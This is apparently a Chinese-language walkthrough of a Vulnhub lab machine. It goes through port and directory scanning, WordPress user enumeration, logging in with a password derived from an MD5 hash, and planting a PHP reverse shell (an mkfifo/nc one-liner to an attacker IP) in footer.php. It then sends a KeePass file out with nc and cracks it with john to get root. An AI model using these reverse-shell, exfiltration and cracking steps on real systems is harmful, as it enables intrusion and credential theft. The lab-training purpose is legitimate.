1. 环境搭建
Vuluhub 靶场 IP 问题 - Kyon-H Blog
2. 信息搜集
搜索 IP,发现主机 192.168.163.134
扫描端口发现 66 和 80 两个 http 端口
1
namp -T4 -A -p- 192.168.163.134
扫描目录,发现 80 端口无内容,扫描 66 端口
1
dirsearch -u http://192.168.163.134:66/
访问changelog.txt确定vvmlist版本为 16.01.2021
whatweb 扫描网站
主页发现链接可以下载项目压缩包: http://192.168.163.134:66/vvmlist.zip
解压后打开
发现sshpasswd.png图片获取疑似用户名:mossad
网站主页发现特殊字符串,分析是Brainfuck代码
解码得到 /sshpasswd.png
查看项目文件,在 sense.md 文件找到提示
访问/lyricsblog 发现 wordpress 站点,F12 发现提示,访问到图片
扫描目录
1
dirsearch -u http://192.168.163.134/lyricsblog/ -e* -i 200
发现后台登录地址 /lyricsblog/wp-login.php
2.1. 获取用户名密码
wpscan 扫描用户名,获取到 erdalkomurcu
1
2
3
wpscan --url http://192.168.163.134/lyricsblog/ -e u
# 保存
echo "erdalkomurcu" > user.txt
浏览站点发现与图片中文字相同的文章
将文章内容保存到 lyrics.txt 计算其 MD5 值
转换为大写字符
1
2
echo "bc78c6ab38e114d6135409e44f7cdda2" | tr 'a-z' 'A-Z'
# BC78C6AB38E114D6135409E44F7CDDA2
使用用户名:erdalkomurcu,密码:BC78C6AB38E114D6135409E44F7CDDA2 登陆成功
3. 反弹 shell
浏览页面找到可以注入 PHP 代码的位置
在 footer.php 添加反弹 shell 代码
1
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.163.132 4444 >/tmp/f');
kali 执行 nc -lvp 4444 开启监听,并反弹成功
发现raphael用户目录下user.txt但无权查看
查找网站配置文件,发现数据库配置
获得用户名:raphael,密码:_double_trouble_
尝试切换用户,成功
查看 user.txt文件,发现内容
4. root 提权
查看隐藏文件,发现 .chadroot.kdbx文件
.kdbx为密码管理软件 KeePass生成的密码文件后缀名
传输到 kali 进行解密
1
2
3
4
5
6
7
# dc-9
nc 192.168.163.132 5555 < .chadroot.kdbx
# kali
nc -lvp 5555 >keepass
# 解密
keepass2john keepass | tee pass.txt
john pass.txt
解密得到 chatter
打开网站KeeWeb上传 keepass文件,输入密码 chatter,得到 4 组 root 密码
1
2
3
4
.:.yarak.:.
secretservice
.:.subjective.:.
rockyou.txt
使用 .:.subjective.:. 登录成功
5. 获取 flag
